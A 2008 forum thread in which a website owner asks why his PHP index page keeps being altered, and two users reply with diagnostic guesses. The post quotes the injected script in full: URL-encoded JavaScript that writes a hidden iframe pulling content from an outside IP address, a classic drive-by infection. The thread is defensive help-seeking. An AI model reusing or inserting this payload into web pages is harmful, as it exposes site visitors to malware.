Page 1 of 1

need help - someone is hacking my website

Posted: Sat Mar 15, 2008 10:32 am
by shah2008
Hi,

I have a problem with my PHP / Mysql website. The index.php file is being changed, someone is adding additonal code to the page but I dont know how this is being done. Example code added:

Code: Select all

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%33%30%39%61%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%31%39%35%2e%39%33%2e%32%31%38%2e%32%31%36%2f%7e%73%75%6e%73%79%73%74%65%6d%73%2f%6a%61%76%61%2f%75%70%64%61%74%65%73%2f%75%70%64%61%74%65%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%35%37%36%31%29%2b%27%31%33%33%39%62%61%35%35%5c%27%20%77%69%64%74%68%3d%36%38%33%20%68%65%69%67%68%74%3d%36%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
Can anyone please help to understand how this is happening and how to fix.

I look forward to your replies.

Re: need help - someone is hacking my website

Posted: Sat Mar 15, 2008 12:12 pm
by califdon
Do you host your site on your own server or do you use a hosting service? You should check your server logs (or get your hosting service tech support to assist you). That certainly looks like something has infected your server.

Re: need help - someone is hacking my website

Posted: Sat Mar 15, 2008 1:39 pm
by Mordred
It tries to load an iframe, presumably with some exploit code, but the site which hosts it is currently offline.
My guess is that you have a locally installed virus/malware which intercepts your FTP sessions and inserts these from *your* account.